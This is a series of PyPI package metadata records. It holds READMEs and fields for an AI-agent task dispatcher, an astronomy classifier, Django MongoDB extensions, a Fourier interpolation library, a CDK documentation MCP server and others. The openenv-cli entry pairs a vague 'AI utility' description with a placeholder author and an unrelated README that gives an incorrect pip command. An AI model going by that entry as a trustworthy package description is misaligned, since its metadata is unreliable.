# artificer-dispatcher Polls task queues, dispatches agent subprocesses, and exposes an HTTP API so agents can interact with tasks without knowing which backend is in use. ## How it works The router polls configured queues for ready tasks. When it finds one, it moves the task to an in-progress queue, spawns a subprocess (any command), and passes task details to the agent. The subprocess uses a local HTTP API to read task details, post comments, update fields, and move the task when done. The agent never talks to the backend directly. ## Key concepts - **Backend adapters** — Protocol-based (`TaskAdapter`, 11 methods). Ships with a JSON file adapter. A Planka adapter is included as a user-land example (`planka_backend.py`). Implement the protocol for anything else (Jira, Trello, Linear, SQLite, SQS, etc.). - **Agent adapters** — Protocol-based (`AgentAdapter`). Ships with a Claude adapter (session tracking, resume hints) and a default pass-through for any command. - **Routes** — Flask-style `@dispatcher.route()` decorators map queues to prompt-generating functions. - **HTTP API** — Agents hit localhost. No credentials, no backend coupling. ## Quick start Requires Python 3.13+. ```sh uv pip install -e . # preferred (pip install -e . also works) uv pip show artificer-dispatcher # verify the install succeeded ``` Create a Python script (e.g. `run.py`): ```python from artificer import AgentDispatcher, JsonFileAdapter dispatcher = AgentDispatcher( command="claude", poll_interval=30, agent_timeout=600, max_concurrent_agents=3, queue_backend=JsonFileAdapter("/tmp/board.json"), ) @dispatcher.route( args=["--agent", "engineer", "-p"], queue_name="Todo", in_progress_queue="In Progress", ) def engineer_agent(task_id: str, task_name: str) -> str: return f"Work on task {task_id}: {task_name}." if __name__ == "__main__": dispatcher.run(debug=True) # enable DEBUG logging (default: False) ``` > For Planka users, see `planka_backend.py` at the repo root for a ready-made backend. ```sh python run.py ``` This starts two things: 1. **Router** — polls configured queues, picks up tasks, moves them to in-progress, and spawns agent subprocesses. 2. **HTTP API** — listens on `http://{api_host}:{api_port}` so spawned agents can interact with tasks. ## Configuration reference All configuration is done via the `AgentDispatcher` constructor. ### Constructor arguments | Argument | Type | Default | Description | |---|---|---|---| | `command` | `str` | *(required)* | Base command to run for all routes (e.g. `"claude"`) | | `poll_interval` | `int` | `30` | Seconds between polls | | `agent_timeout` | `int \| None` | `None` | Default timeout in seconds for all agents | | `max_concurrent_agents` | `int` | `3` | Max agent processes at once | | `api_host` | `str` | `"127.0.0.1"` | HTTP API bind address | | `api_port` | `int` | `8000` | HTTP API port | | `queue_backend` | `TaskAdapter \| None` | `None` | Task backend (required before calling `run()`). Any object with a `create_adapter()` method also works. | | `agent_adapters` | `dict[str, AgentAdapter] \| None` | `None` | Custom agent adapters by command name | | `enable_queue_management` | `bool` | `False` | Enable queue CRUD HTTP endpoints | ### Route decorator The `@dispatcher.route()` decorator registers a queue-to-command mapping. The decorated function receives `(task_id, task_name)` and returns a prompt string appended to the command arguments. ```python @dispatcher.route( queue_name="My Project.My Board.Todo", # required: queue to poll in_progress_queue="My Project.My Board.WIP", # default: "In Progress" args=["--agent", "engineer", "-p"], # extra args before prompt timeout=1800, # route-specific timeout (optional) poll_interval=10, # route-specific poll interval (optional) priority=1, # dispatch priority (optional) ) def my_agent(task_id: str, task_name: str) -> str: return f"Work on task {task_id}: {task_name}." ``` ### Agent timeouts You can configure timeouts to automatically terminate agent processes that run too long: - **`agent_timeout`** (constructor): Sets a global timeout in seconds for all agents. If not specified, agents run indefinitely. - **`timeout`** (per-route): Sets a route-specific timeout in seconds. Overrides `agent_timeout` for that route. When an agent times out: 1. The process receives a TERM signal and has 5 seconds to exit gracefully 2. If it doesn't exit, it receives a KILL signal 3. A comment is added to the task noting the timeout ```python dispatcher = AgentDispatcher( command="my-agent", agent_timeout=3600, # 1 hour default for all agents queue_backend=my_backend, ) @dispatcher.route( queue_name="Quick Tasks", timeout=300, # 5 minutes for quick tasks (overrides default) ) def quick(task_id, task_name): return f"Handle {task_id}" @dispatcher.route(queue_name="Long Tasks") # No timeout — uses default of 3600 seconds def long_running(task_id, task_name): return f"Handle {task_id}" ``` ### Route priority When `max_concurrent_agents` is limited, routes with lower `priority` values are dispatched first. This lets you ensure downstream queues (closer to completion) are serviced before upstream ones, so a task flows all the way through a pipeline before new work begins. Routes without an explicit `priority` use their registration order as a tiebreaker. ```python @dispatcher.route(queue_name="QA", priority=1) # serviced first def qa(task_id, task_name): return f"Review {task_id}" @dispatcher.route(queue_name="Engineering", priority=2) def eng(task_id, task_name): return f"Implement {task_id}" @dispatcher.route(queue_name="Todo", priority=3) # serviced last def todo(task_id, task_name): return f"Handle {task_id}" ``` ### Per-queue poll intervals By default, all queues are polled at the global `poll_interval` rate. You can override this per-route to poll high-priority queues more frequently or low-priority queues less often: The router's internal tick rate automatically adjusts to the shortest configured interval, so no queue is ever starved. ```python dispatcher = AgentDispatcher( command="my-agent", poll_interval=60, # default for all queues queue_backend=my_backend, ) @dispatcher.route(queue_name="High Priority", poll_interval=10) def urgent(task_id, task_name): return f"Handle {task_id}" @dispatcher.route(queue_name="Background", poll_interval=1800) def background(task_id, task_name): return f"Handle {task_id}" @dispatcher.route(queue_name="Normal") # No poll_interval — uses global default of 60s def normal(task_id, task_name): return f"Handle {task_id}" ``` ## HTTP API | Method | Endpoint | Description | |---|---|---| | `GET` | `/tasks/{task_id}` | Full task info: description, labels, assignees, comments | | `POST` | `/tasks/{task_id}/comments` | Post a comment on a task (`{"comment": "text"}`) | | `POST` | `/tasks/{task_id}/move` | Move a task to a different queue (`{"target_queue": "name"}`) | | `PATCH` | `/tasks/{task_id}` | Update task fields (`{"name": "...", "description": "...", "labels": [...], "assignees": [...]}`) | | `POST` | `/tasks` | Create a new task (`{"queue_name": "...", "name": "...", "description": "..."}`) | | `GET` | `/queues` | List all queues with task counts | | `GET` | `/queues/{queue_name}` | Get details for a specific queue | | `POST` | `/queues` | Create a new queue (`{"name": "..."}`) | | `PATCH` | `/queues/{queue_name}` | Update/rename a queue (`{"name": "..."}`) | | `DELETE` | `/queues/{queue_name}` | Delete an empty queue | | `GET` | `/status` | Router status: active agents, available slots | ## Task lifecycle 1. Task sits in a watched queue (e.g. `Todo`) 2. Router picks it up, moves it to the in-progress queue, and assigns the authenticated user 3. Router spawns the configured command as a subprocess 4. The agent uses the HTTP API to read task details, add comments, etc. 5. When finished, the agent calls the move endpoint to move the task to a done queue ## Backends ### Planka The Planka backend is provided as a user-land file (`planka_backend.py` at the repo root), not as part of the library. It requires `plankapy>=2.3.0` to be installed separately: ```sh uv pip install plankapy>=2.3.0 ``` Uses dot-notation for queue naming: `Project.Board.List`. ```python from artificer import AgentDispatcher from planka_backend import PlankaBackend dispatcher = AgentDispatcher( command="my-agent", queue_backend=PlankaBackend(url="http://localhost:1337"), ) @dispatcher.route( queue_name="My Project.My Board.Todo", in_progress_queue="My Project.My Board.In Progress", args=["-p"], ) def handle(task_id: str, task_name: str) -> str: return f"Work on task {task_id}: {task_name}" ``` #### Planka authentication Credentials can be passed directly as kwargs or resolved from environment variables: ```python # Option 1: API token (kwarg) PlankaBackend(url="http://localhost:3000", token="your-token-here") # Option 2: Username + password (kwargs) PlankaBackend(url="http://localhost:3000", username="admin", password="secret") # Option 3: Environment variables (default when no kwargs are given) # PLANKA_TOKEN=your-token-here # — or — # PLANKA_USER=admin + PLANKA_PASSWORD=secret PlankaBackend(url="http://localhost:3000") ``` Credentials are resolved at `dispatcher.run()` time, not at import time. If you use `.env` files, call `dotenv.load_dotenv()` in your script before `dispatcher.run()`. ### JSON file For development/testing or lightweight use without external services. ```python from artificer import AgentDispatcher, JsonFileAdapter dispatcher = AgentDispatcher( command="my-agent", queue_backend=JsonFileAdapter("/tmp/board.json"), ) ``` The JSON file structure: ```json { "queues": { "Todo": [ {"id": "1", "name": "Fix crash", "description": "...", "labels": [], "assignees": [], "comments": [], "tasks": []} ], "In Progress": [], "Done": [] } } ``` ### Custom Implement the `TaskAdapter` protocol (11 methods) in `artificer/adapters/base.py`: - `get_ready_tasks(queue_names)` — Return tasks from the given queues - `get_task(task_id)` — Return a single task by ID - `move_task(task_id, target_queue)` — Move a task between queues - `add_comment(task_id, text)` — Add a comment to a task - `update_task(task_id, *, assignees, name, description, labels)` — Update task fields - `create_task(queue_name, name, description)` — Create a new task - `list_queues()` — List all queues with task counts - `get_queue(queue_name)` — Get a single queue's info - `create_queue(queue_name)` — Create a new empty queue - `update_queue(queue_name, *, new_name)` — Rename a queue - `delete_queue(queue_name)` — Delete an empty queue Pass your custom adapter directly to the constructor: ```python dispatcher = AgentDispatcher( command="my-agent", queue_backend=MyCustomAdapter(), ) ``` ## Development ```sh uv pip install -e ".[dev]" # pip install -e ".[dev]" also works pytest ```
text/markdown
null
Scott <me@scottrussell.net>
null
null
null
agent, ai, automation, dispatcher
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.13", "Topic :: Software Development :: Build Tools" ]
[]
null
null
>=3.13
[]
[]
[]
[ "starlette>=0.30.0", "uvicorn>=0.20.0" ]
[]
[]
[]
[]
uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:31:08.120473
artificer_dispatcher-0.2.4.tar.gz
64,638
bf/ae/fdd8816c2d79bf4f918b3d523a8ba141a7e1f77d0c84ef2ff36185c29c69/artificer_dispatcher-0.2.4.tar.gz
source
sdist
null
false
080b071c4a285c45ca5ab8487a049b7b
8eec1e83ec2dbf8fccc17684279ec9082c3f63065d947241b945e00e2edf8ff8
bfaefdd8816c2d79bf4f918b3d523a8ba141a7e1f77d0c84ef2ff36185c29c69
MIT
[ "LICENSE" ]
230
2.4
seshat-classifier
0.1.11
A package for classifying tabular photometry data from JWST, Spitzer, and 2MASS according to one of YSOs, field stars, brown dwarfs, white dwarfs, or galaxies.
# Stellar Evolutionary Stage Heuristic Assessment Tool (SESHAT) ![SESHAT logo](src/seshat_classifier/data/SESHAT_new.png "") Important caveat: In the current distribution, MIR data are necessary to classify YSOs to the expected performance. Without MIR data, the real performance deviates significantly from the synthetic set performance. This does not apply to other classes. If you use this package, please cite [Crompvoets et al. 2025](https://ui.adsabs.harvard.edu/abs/2025arXiv251007747C/abstract). Please also cite the original producers of the data used/producers of the software used to create the data used for this work: YSOs: [Richardson et al. (2024)](https://ui.adsabs.harvard.edu/abs/2024ApJ...961..188R/abstract) Brown dwarfs: ATMO -- [Phillips et al. (2020)](https://ui.adsabs.harvard.edu/abs/2020A%26A...637A..38P/abstract) White dwarfs: [Blouin et al. (2018)](https://ui.adsabs.harvard.edu/abs/2018ApJ...863..184B/abstract) Field stars: PARSEC -- [Bressen et al. (2012)](https://ui.adsabs.harvard.edu/abs/2012MNRAS.427..127B/abstract) Galaxies: CIGALE -- [Burgarella et al. 2005](https://ui.adsabs.harvard.edu/abs/2005MNRAS.360.1413B/abstract), [Noll et al. 2009](https://ui.adsabs.harvard.edu/abs/2009A%26A...507.1793N/abstract) [Boquin et al. (2020)](https://ui.adsabs.harvard.edu/abs/2019A%26A...622A.103B/abstract) ## Catalog set-up Please have your catalog set-up with the columns as: Spitzer: ['IRAC1', 'IRAC2', 'IRAC3', 'IRAC4', 'MIPS1'] 2MASS: ['J', 'H', 'Ks'] JWST: in the frame of 'f090w', or 'f322w2'. Please include errors as 'e_' + filter name; e.g. 'e_f090w', 'e_IRAC2'. All columns must be in Vega mags. If you have labels already known, these should be under the column: 'Class' The labels should match the following: Young Stellar Objects: "YSO" Field stars: "FS" Galaxies: "Gal" White dwarfs: "WD" Brown dwarfs: "BD" ## Other important information The function classify accepts pandas DataFrames or Astropy Tables. When testing filters, you must input limiting and saturating magnitudes of each filter, as well as what an appropriate distribution of errors for the data might be. These errors are used to add noise to the training/testing data. SESHAT only takes medium, wide, and very-wide filters as input for JWST, no narrow filters. ## Example of obtaining classifications ~~~ from seshat_classifier import seshat import pandas as pd # Read in catalog my_catalog = pd.read_csv("my_catalog.csv") # Specify classes to be identified classes = ['YSO', 'FS', 'Gal'] # Get classifications my_catalog_classified = seshat.classify(real = my_catalog, classes = classes, cosmological = False, return_test=False, threads = 8) # Get classifications and test set performance my_catalog_classified, test_results = seshat.classify(real = my_catalog, classes = classes, return_test=True, threads = 8) ~~~ ## Example of testing filters ~~~ from seshat_classifier import seshat import numpy as np import matplotlib.pyplot as plt # Specify filters to test filters = ['f090w', 'f200w', 'f356w', 'f480m', 'f770w', 'f1500w'] # Specify classes to search for classes = ['YSO', 'FS', 'Gal'] # Specify the limiting and saturating magnitudes of your proposed observations limiting_mags = {'f090w':22, 'f200w':23, 'f356w':24, 'f480m':25, 'f770w':22, 'f1500w':24} saturating_mags = {'f090w':14, 'f200w':13, 'f356w':12, 'f480m':11, 'f770w':15, 'f1500w':14} # Specify the expected distribution of errors sig = 0.02 mean = 0.1 errs = [np.random.normal(mean, sig, size=100) for f in filters] # Choose a suitably large size to capture shape of distribution # Get the performance test_results = seshat.test_filters(filters = filters, classes=classes, limiting_mags = limiting_mags, saturating_mags = saturating_mags, errs=errs, threads = 8) # Plot performance ax = seshat.cm_custom(test_results.Class,test_results.Predicted_Class,cmap='Greys',display_labels=classes) plt.show() ~~~
text/markdown
null
Breanna Crompvoets <bcrompvoets@uvic.ca>
null
null
null
null
[ "Programming Language :: Python :: 3", "Operating System :: OS Independent" ]
[]
null
null
>=3.9
[]
[]
[]
[ "numpy>=1.26.4", "pandas>=2.2.0", "matplotlib>=3.7.0", "seaborn>=0.12.0", "scikit-learn>=1.3.0", "astropy>=6.0.0", "xgboost>=1.7.0", "requests<3.0.0,>=2.31.0" ]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:57.014207
seshat_classifier-0.1.11.tar.gz
1,085,472
6e/57/eaa6a0a2d18ccd59b09ee715e8cf34b482e4123ad73f12a6f15e1ebdb2e4/seshat_classifier-0.1.11.tar.gz
source
sdist
null
false
a930fb6453a4a3d6092af1f96aaac2ab
7eab4af1fce4618bb90fd3be76ce626be141d981d2f2b4086f80515cb887ad72
6e57eaa6a0a2d18ccd59b09ee715e8cf34b482e4123ad73f12a6f15e1ebdb2e4
MIT
[ "LICENSE" ]
232
2.4
django-mongodb-extensions
0.1.0a1
Extensions for Django MongoDB Backend
# django-mongodb-extensions Extensions for Django MongoDB Backend
text/markdown
null
null
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[]
[]
null
null
>=3.10
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:13.112191
django_mongodb_extensions-0.1.0a1.tar.gz
10,983
d1/72/2c11d160447dc6a96b0e684c60848abddd4a69fc3ac19c92c201d3e1beb7/django_mongodb_extensions-0.1.0a1.tar.gz
source
sdist
null
false
b166de4db4bd446f74c75af46c051582
0c3c74a8315dbf218bd38c4335687328f401c0f4a0c1c7e181643b0d7815ac88
d1722c11d160447dc6a96b0e684c60848abddd4a69fc3ac19c92c201d3e1beb7
null
[ "LICENSE" ]
215
2.4
interpax-fft
0.0.4
Fourier interpolation and function approximation with JAX
############ interpax_fft ############ |License| |Issues| |Pypi| |Docs| |UnitTests| |Codecov| ``interpax_fft`` is a library for Fourier interpolation and function approximation using JAX. ``interpax_fft`` extends `interpax <https://github.com/f0uriest/interpax>`__ with more utilities for (pseudo-spectral) interpolation. Installation ============ ``interpax_fft`` is installable with ``pip``: .. code-block:: sh pip install interpax_fft For full details of various options see the `API documentation <https://unalmis.github.io/interpax_fft/>`__. .. |License| image:: https://img.shields.io/github/license/unalmis/interpax_fft?color=blue&logo=open-source-initiative&logoColor=white :target: https://github.com/unalmis/interpax_fft/blob/main/LICENSE :alt: License .. |Docs| image:: https://github.com/unalmis/interpax_fft/actions/workflows/docs.yml/badge.svg :target: https://unalmis.github.io/interpax_fft/ :alt: Documentation .. |UnitTests| image:: https://github.com/unalmis/interpax_fft/actions/workflows/unittest.yml/badge.svg :target: https://github.com/unalmis/interpax_fft/actions/workflows/unittest.yml :alt: UnitTests .. |Codecov| image:: https://codecov.io/gh/unalmis/interpax_fft/graph/badge.svg?token=LHXGSGB9DF :target: https://codecov.io/gh/unalmis/interpax_fft :alt: Coverage .. |Issues| image:: https://img.shields.io/github/issues/unalmis/interpax_fft :target: https://github.com/unalmis/interpax_fft/issues :alt: GitHub issues .. |Pypi| image:: https://img.shields.io/pypi/v/interpax_fft :target: https://pypi.org/project/interpax_fft/ :alt: Pypi
text/x-rst
Kaya Unalmis
kunalmis@stanford.edu
null
null
MIT
interpolation fourier approximation
[ "Development Status :: 3 - Alpha", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Pytho...
[]
https://github.com/unalmis/interpax_fft
null
>=3.10
[]
[]
[]
[ "equinox!=0.13.3,>=0.11.0", "jax!=0.5.1,!=0.5.2,!=0.6.0,!=0.7.1,!=0.8.2,!=0.9.0,>=0.5.0", "jaxtyping>=0.2.24", "numpy>=1.20.0" ]
[]
[]
[]
[ "Issues Tracker, https://github.com/unalmis/interpax_fft/issues", "Contributing, https://github.com/unalmis/interpax_fft/blob/master/CONTRIBUTING.rst", "Source Code, https://github.com/unalmis/interpax_fft/", "Documentation, https://unalmis.github.io/interpax_fft/" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:09.223803
interpax_fft-0.0.4.tar.gz
37,617
22/8d/dc55b1043a3afbbbb4cce72352ff867b3a3a79cec13448b9df9e34ec9916/interpax_fft-0.0.4.tar.gz
source
sdist
null
false
4c2d7e2f6fc316dc087218384ca58438
f3fb382a32cc4987648a1e24ee3d706a2955f5ced3a1ebb07b267c96ff1938bb
228ddc55b1043a3afbbbb4cce72352ff867b3a3a79cec13448b9df9e34ec9916
null
[ "LICENSE" ]
288
2.4
konokenj.cdk-api-mcp-server
0.75.0
An MCP server provides AWS CDK API Reference
# CDK API MCP Server [![PyPI - Version](https://img.shields.io/pypi/v/konokenj.cdk-api-mcp-server.svg)](https://pypi.org/project/konokenj.cdk-api-mcp-server) [![PyPI - Python Version](https://img.shields.io/pypi/pyversions/konokenj.cdk-api-mcp-server.svg)](https://pypi.org/project/konokenj.cdk-api-mcp-server) <!-- DEP-VERSIONS-START --> [![aws-cdk](https://img.shields.io/badge/aws%20cdk-v2.238.0-blue.svg)](https://github.com/konokenj/cdk-api-mcp-server/blob/main/current-versions/aws-cdk.txt) <!-- DEP-VERSIONS-END --> --- Provide AWS CDK API references and integration test code for sample. Can be used in offline because all documents are included in the released python artifact. ## Usage Add to your mcp.json: ```json { "mcpServers": { "konokenj.cdk-api-mcp-server": { "command": "uvx", "args": ["konokenj.cdk-api-mcp-server@latest"] } } } ``` ## MCP Server Capabilities ### Resource: CDK API packages Registered as static resources. To get available modules under the package, call `list_resources()` as MCP client. - `cdk-api-docs://constructs/@aws-cdk` ... Alpha modules published in `@aws-cdk` namespace - `cdk-api-docs://constructs/aws-cdk-lib` ... Stable modules in `aws-cdk-lib` package ### Resource Template: List modules in package To get available documents under the module, call `read_resource(uri)` as MCP client. - `cdk-api-docs://constructs/@aws-cdk/{module}` - `cdk-api-docs://constructs/aws-cdk-lib/{module}` ### Resource Template: Read file contents To read a document, call `read_resource(uri)` as MCP client. - `cdk-api-docs://constructs/@aws-cdk/{module}/{file}` - `cdk-api-docs://constructs/aws-cdk-lib/{module}/{file}` ## License Distributed under the terms of the [MIT](https://spdx.org/licenses/MIT.html) license.
text/markdown
null
Kenji Kono <konoken@amazon.co.jp>
null
null
null
null
[ "Development Status :: 4 - Beta", "Programming Language :: Python", "Programming Language :: Python :: 3.13" ]
[]
null
null
>=3.8
[]
[]
[]
[ "fastmcp>=2.0.0", "pydantic>=2.10.6", "mypy; extra == \"dev\"", "pygithub; extra == \"dev\"", "semantic-version; extra == \"dev\"" ]
[]
[]
[]
[ "Documentation, https://github.com/konokenj/cdk-api-mcp-server#readme", "Issues, https://github.com/konokenj/cdk-api-mcp-server/issues", "Source, https://github.com/konokenj/cdk-api-mcp-server" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:29:07.938665
konokenj_cdk_api_mcp_server-0.75.0.tar.gz
8,767
37/d1/87ff69acced5cab0528d97898bfa8dea2f307533b3fa70a24bdab39042a1/konokenj_cdk_api_mcp_server-0.75.0.tar.gz
source
sdist
null
false
e929ee1ef787d9bc5e385bfbdb59de07
8b54cf9760c1830b39dce79f93238f8c113d9df08d430288a5b2eb00b574a6c8
37d187ff69acced5cab0528d97898bfa8dea2f307533b3fa70a24bdab39042a1
MIT
[ "LICENSE.txt" ]
0
2.4
openenv-cli
0.0.1
A professional-grade AI utility for automated data synchronization and backend management.
# Installation To install requirements: `python -m pip install requirements.txt` To save requirements: `python -m pip list --format=freeze --exclude-editable -f https://download.pytorch.org/whl/torch_stable.html > requirements.txt` * Note we use Python 3.9.4 for our experiments # Running the code For remaining experiments: Navigate to the corresponding directory, then execute: `python run.py -m` with the corresponding `config.yaml` file (which stores experiment configs). # License Consult License.md
text/markdown
null
AI Research Team <Ai-model@example.com>
null
null
null
automation, api-client, sync, tooling
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent" ]
[]
null
null
>=3.8
[]
[]
[]
[ "requests>=2.28.0", "urllib3>=1.26.0" ]
[]
[]
[]
[ "Homepage, https://github.com/ai/library", "Bug Tracker, https://github.com/ai/library/issues" ]
twine/6.2.0 CPython/3.14.3
2026-02-19T22:28:01.792752
openenv_cli-0.0.1.tar.gz
3,563
99/1a/2bfa7cc0bca9b592e5bdcb22207e3e78a8337505f25cd43b022d3c932eeb/openenv_cli-0.0.1.tar.gz
source
sdist
null
false
72147dec7dd973e3468890dbac2f8290
165fc6bc13e39d88fab6902747a5e8dda63aab1673c6a6c466f920688bf616f4
991a2bfa7cc0bca9b592e5bdcb22207e3e78a8337505f25cd43b022d3c932eeb
null
[ "LICENSE.txt" ]
236
2.4
dump-things-service
5.5.0
A simple service to store and retrieve schema-conform data records
### Dump Things Service [![PyPI version fury.io](https://badge.fury.io/py/dump-things-service.svg)](https://pypi.python.org/pypi/dump-things-service/) This is an implementation of a service that allows to store and retrieve data that is structured according to given schemata. Data is stored in **collections**. Each collection has a name and an associated schema. All data records in the collection have to adhere to the given schema. The canonical format for schemas is [LinkML](https://linkml.io/). The service supports schemas that are based on Datalad's *Thing* schema, i.e. on [https://concepts.datalad.org/s/things/v1/](https://concepts.datalad.org/s/things/v1/). It assumes that the classes of stored records are subclasses of `Thing`, and inherit the properties `pid` and `schema_type` from the `Thing`-baseclass. The general workflow in the service is as follows. We distinguish between two areas of a collection, an **incoming** area and a **curated** area. Data written to a collection is stored in a collection-specific **incoming** area. A curation process, which is outside the scope of the service, moves data from the incoming area of a collection to the **curated** area of the collection. To submit a record to a collection, a token is required. The token defines read- and write- permissions for the incoming areas of collections and read-permissions for the curated area of a collection. A token can carry permissions for multiple collections. In addition, the token carries a submitter ID. It also defines a token specific **zone** in the incoming area. So any read- and write-operations on an incoming area are actually restricted to the token-specific zone in the incoming area. Multiple tokens can share the same zone. That allows multiple submitters to work together when storing records in the service. The service provides an HTTP-based API to store and retrieve data objects, and to verify token capabilities. ### Installing the service The service is available via `pypi`, and can be installed by `pip`. Execute the command `pip install dump-things-service` to install the service. ### Running the service After installation the service can be started via the command `dump-things-service`. The basic service configuration is done via command line parameters and configuration files. The following command line parameters are 